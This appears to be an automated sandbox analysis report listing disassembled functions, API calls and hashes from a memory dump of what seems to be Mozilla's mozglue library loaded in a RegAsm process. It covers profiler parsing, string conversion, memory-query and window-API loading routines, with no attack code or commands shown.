                                                          • Part of subcall function 6C0D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0D81DE
                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C127096
                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C12709C
                                                        • LocalFree.KERNEL32(?), ref: 6C1270AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __acrt_iob_func$ErrorFormatFreeLastLocalMessage__stdio_common_vfprintffflush
                                                        • String ID: ### ERROR: %s: %s$(null)
                                                        • API String ID: 2989430195-1695379354
                                                        • Opcode ID: bdd49075cd2e5c90aff6d77d6cb59cf1e8e13f18f4229ddc72446a7ae91a7f41
                                                        • Instruction ID: 948798c06a7dc0b7dd82de01770cf057dc568fa603f0eeeea2a58ab3e3e70030
                                                        • Opcode Fuzzy Hash: bdd49075cd2e5c90aff6d77d6cb59cf1e8e13f18f4229ddc72446a7ae91a7f41
                                                        • Instruction Fuzzy Hash: F40179B1A00104AFDB04ABA5DC4ADAF7BBCEF49259F014425FA05A7241E671B9188BE1
                                                        Function 6C112C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C112C31
                                                        • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C112C61
                                                          • Part of subcall function 6C0C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0C4E5A
                                                          • Part of subcall function 6C0C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0C4E97
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C112C82
                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C112E2D
                                                          • Part of subcall function 6C0D81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C0D81DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                        • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                        • API String ID: 801438305-4149320968
                                                        • Opcode ID: 686b80d743dd3d018972426ceb2e84c69b472d3751a69f3bfea79dc40edccd26
                                                        • Instruction ID: 9c68ddfc840a80a7a1ea3ac26f3f4126f9ea4355eefd04cf8d1af7a232730d7c
                                                        • Opcode Fuzzy Hash: 686b80d743dd3d018972426ceb2e84c69b472d3751a69f3bfea79dc40edccd26
                                                        • Instruction Fuzzy Hash: B491D2B060C7408FC724DF24C49469FB7E1EF8A358F50892DE5998BB50EB34D54ACB52
                                                        Function 6C129E30 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 347COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: __aulldiv__aullrem
                                                        • String ID: -Infinity$NaN
                                                        • API String ID: 3839614884-2141177498
                                                        • Opcode ID: 7ca683e5fe2dbd8d375cb9214574d5e30fcdac3a444c6ed467342b12c2f644e2
                                                        • Instruction ID: 305b05d8f6fe2ee110e1a503a3313687f7760bc05b1c7fa48818047a309a404a
                                                        • Opcode Fuzzy Hash: 7ca683e5fe2dbd8d375cb9214574d5e30fcdac3a444c6ed467342b12c2f644e2
                                                        • Instruction Fuzzy Hash: 49C1DF35E043188FDB14CFA8C8607AEB7B6FF89314F154529D505ABB80DB78A989CB91
                                                        Function 6C12B910 Relevance: 9.1, APIs: 6, Instructions: 146nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0D9B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6C12B92D), ref: 6C0D9BC8
                                                          • Part of subcall function 6C0D9B80: __Init_thread_footer.LIBCMT ref: 6C0D9BDB
                                                        • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0D03D4,?), ref: 6C12B955
                                                        • NtQueryVirtualMemory.NTDLL ref: 6C12B9A5
                                                        • NtQueryVirtualMemory.NTDLL ref: 6C12BA20
                                                        • RtlNtStatusToDosError.NTDLL ref: 6C12BA7B
                                                        • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C12BA81
                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6C12BA86
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                        • String ID:
                                                        • API String ID: 1753913139-0
                                                        • Opcode ID: a6402dc52e53157432eb3ae37c2731a0d88f3877088dd7736b54e1a727d7a0c6
                                                        • Instruction ID: d8ed16e4f05d70343eb3b9c6b18a49dd4892b1562a9cc687fa0a65ff29b82c31
                                                        • Opcode Fuzzy Hash: a6402dc52e53157432eb3ae37c2731a0d88f3877088dd7736b54e1a727d7a0c6
                                                        • Instruction Fuzzy Hash: 08519F75E01229DFDF14CFA8D890ADEB7B6EF88318F154129E906B7704DB34AD858B90
                                                        Function 6C108AC0 Relevance: 7.7, APIs: 5, Instructions: 174timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 6C0FFA80: GetCurrentThreadId.KERNEL32 ref: 6C0FFA8D
                                                          • Part of subcall function 6C0FFA80: AcquireSRWLockExclusive.KERNEL32(6C14F448), ref: 6C0FFA99
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108BD5
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108C3A
                                                        • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108C74
                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108CBA
                                                        • free.MOZGLUE(?), ref: 6C108CCF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                        • String ID:
                                                        • API String ID: 2153970598-0
                                                        • Opcode ID: e2ea91b3ca54d47b69a6d26dd39d6fa33e286dbc6bdff905ea684ebdb653b9ce
                                                        • Instruction ID: fbdbd8f902e3de5b83e18ff95e6e3ff1b108c730854894c93359bc3f075b6751
                                                        • Opcode Fuzzy Hash: e2ea91b3ca54d47b69a6d26dd39d6fa33e286dbc6bdff905ea684ebdb653b9ce
                                                        • Instruction Fuzzy Hash: 68718F75A18B008FD704CF29C58065AB7F1FF99318F558A5EE9899B722EB70F884CB41
                                                        Function 6C0CF280 Relevance: 7.6, APIs: 5, Instructions: 87nativelibraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQueryVirtualMemory.NTDLL ref: 6C0CF2B4
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 6C0CF2F0
                                                        • NtQueryVirtualMemory.NTDLL ref: 6C0CF308
                                                        • RtlNtStatusToDosError.NTDLL ref: 6C0CF36B
                                                        • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6C0CF371
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                        • String ID:
                                                        • API String ID: 1171715205-0
                                                        • Opcode ID: 7d8db8461f9d4613630820dc2719310a0151e2319868a15d9e72a8420265844d
                                                        • Instruction ID: a9a275eb6347fb4dbb9b820fb15b3a1536162346c314d4e5a09ea6751a61aa9d
                                                        • Opcode Fuzzy Hash: 7d8db8461f9d4613630820dc2719310a0151e2319868a15d9e72a8420265844d
                                                        • Instruction Fuzzy Hash: 8521A570B05318FBEB10AA55CE54BEF76FCAB4535CF14422AE434965C0D7B49988C763
                                                        Function 6C13545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C138A4B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID:
                                                        • API String ID: 2221118986-0
                                                        • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                        • Instruction ID: 5240b5e6c822648ec2bb73d1e12d5c5294031dbf71df05dc957a47d0b4235344
                                                        • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                        • Instruction Fuzzy Hash: 48B1D772A0022ACFDB14CF68CC90799B7B2EF95318F1512AAC54DEB785D730A985CF90
                                                        Function 6C13542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C1388F0
                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C13925C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID:
                                                        • API String ID: 2221118986-0
                                                        • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                        • Instruction ID: 60356d39bd46498cd30f4f1c09308f0b171537d9f70af1718cfe99cd0ac3e6ba
                                                        • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                        • Instruction Fuzzy Hash: F4B1E672E0011ACFDB14CF58CC907ADB7B2AF84318F15026AC949EB785D730A989CB90
                                                        Function 6C1350C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C138E18
                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C13925C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID:
                                                        • API String ID: 2221118986-0
                                                        • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                        • Instruction ID: 5a77f2499855380d969ea7a6879638741e53cb39121f2bd1649efdaa0e1461f8
                                                        • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                        • Instruction Fuzzy Hash: C6A1D772E001268FDB14CF68CC90799B7B2AF95318F1542BAC94DEB785D730A999CB90
                                                        Function 6C1177A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C117A81
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C117A93
                                                          • Part of subcall function 6C0E5C50: GetTickCount64.KERNEL32 ref: 6C0E5D40
                                                          • Part of subcall function 6C0E5C50: EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67
                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C117AA1
                                                          • Part of subcall function 6C0E5C50: __aulldiv.LIBCMT ref: 6C0E5DB4
                                                          • Part of subcall function 6C0E5C50: LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E5DED
                                                        • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C117B31
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                        • String ID:
                                                        • API String ID: 4054851604-0
                                                        • Opcode ID: 8a4483fb75fbe731d9c463ebedc02f235680249867803a74c93370f7365acb7d
                                                        • Instruction ID: 69c0856cddc9dc0ee1bedeccf507eb4c3e082ad8b0d15e2049bf86996f0f2314
                                                        • Opcode Fuzzy Hash: 8a4483fb75fbe731d9c463ebedc02f235680249867803a74c93370f7365acb7d
                                                        • Instruction Fuzzy Hash: 28B18E3560C3818BCB14CF24D45079FB7E2AFC9318F154A2DE99567B91DB78E90ACB82
                                                        Function 6C12B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • NtQueryVirtualMemory.NTDLL ref: 6C12B720
                                                        • RtlNtStatusToDosError.NTDLL ref: 6C12B75A
                                                        • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C0FFE3F,00000000,00000000,?,?,00000000,?,6C0FFE3F), ref: 6C12B760
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                        • String ID:
                                                        • API String ID: 304294125-0
                                                        • Opcode ID: 535779605aa356c30451102730cdd2f7334823fdd33808d6bc0bc1c618b4f17a
                                                        • Instruction ID: fb47ab3c2d77ed7eade3822704debf77c8c320986ff6df78de707ae9d760f21e
                                                        • Opcode Fuzzy Hash: 535779605aa356c30451102730cdd2f7334823fdd33808d6bc0bc1c618b4f17a
                                                        • Instruction Fuzzy Hash: 4AF0AFB0A4421CAEEF019AA5CC84BEEB7BCDB0431DF106229E516625C0D77CA5C8DA60
                                                        Function 6C12B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0D03D4,?), ref: 6C12B955
                                                        • NtQueryVirtualMemory.NTDLL ref: 6C12B9A5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: MemoryQueryVirtualrand_s
                                                        • String ID:
                                                        • API String ID: 1889792194-0
                                                        • Opcode ID: 43a07b8b276b61dc84603a48876d136d10099cc7fbae3b7f9a5630b7af9acc03
                                                        • Instruction ID: 8288aa5394edb2ee85f777bb00af85991e6eda1fdb4a52c55a72f76ecf137536
                                                        • Opcode Fuzzy Hash: 43a07b8b276b61dc84603a48876d136d10099cc7fbae3b7f9a5630b7af9acc03
                                                        • Instruction Fuzzy Hash: 8441E875F01219DFDF04CFA8D890ADEB7B6EF88318F148129E916A7704DB34A9858B90
                                                        Function 6C1255F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(user32,?,6C0FE1A5), ref: 6C125606
                                                        • LoadLibraryW.KERNEL32(gdi32,?,6C0FE1A5), ref: 6C12560F
                                                        • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C125633
                                                        • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C12563D
                                                        • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C12566C
                                                        • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C12567D
                                                        • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C125696
                                                        • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C1256B2
                                                        • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C1256CB
                                                        • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C1256E4
                                                        • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C1256FD
                                                        • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C125716
                                                        • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C12572F
                                                        • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C125748
                                                        • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C125761
                                                        • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C12577A
                                                        • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C125793
                                                        • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C1257A8
                                                        • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C1257BD
                                                        • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C1257D5
                                                        • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C1257EA
                                                        • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C1257FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                        • API String ID: 2238633743-1964193996
                                                        • Opcode ID: 77f4d638f036c3daafa59d635ebc36883c1ac5c076183427eca7373979df73d5
                                                        • Instruction ID: 4ab8e84669a1de3fb62e7c1fb8d5c56fb3fd39f2608a501d255a6aba54844375
                                                        • Opcode Fuzzy Hash: 77f4d638f036c3daafa59d635ebc36883c1ac5c076183427eca7373979df73d5
                                                        • Instruction Fuzzy Hash: 925145747017139BDB01AF3A8D48D2A3AF8EB5724D750C429E925F6B45EB78C850DF60
                                                        Function 6C10CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C0D582D), ref: 6C10CC27
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C0D582D), ref: 6C10CC3D
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C13FE98,?,?,?,?,?,6C0D582D), ref: 6C10CC56
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CC6C
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CC82
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CC98
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CCAE
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C10CCC4
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C10CCDA
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C10CCEC
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C10CCFE
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C10CD14
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C10CD82
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C10CD98
                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C10CDAE
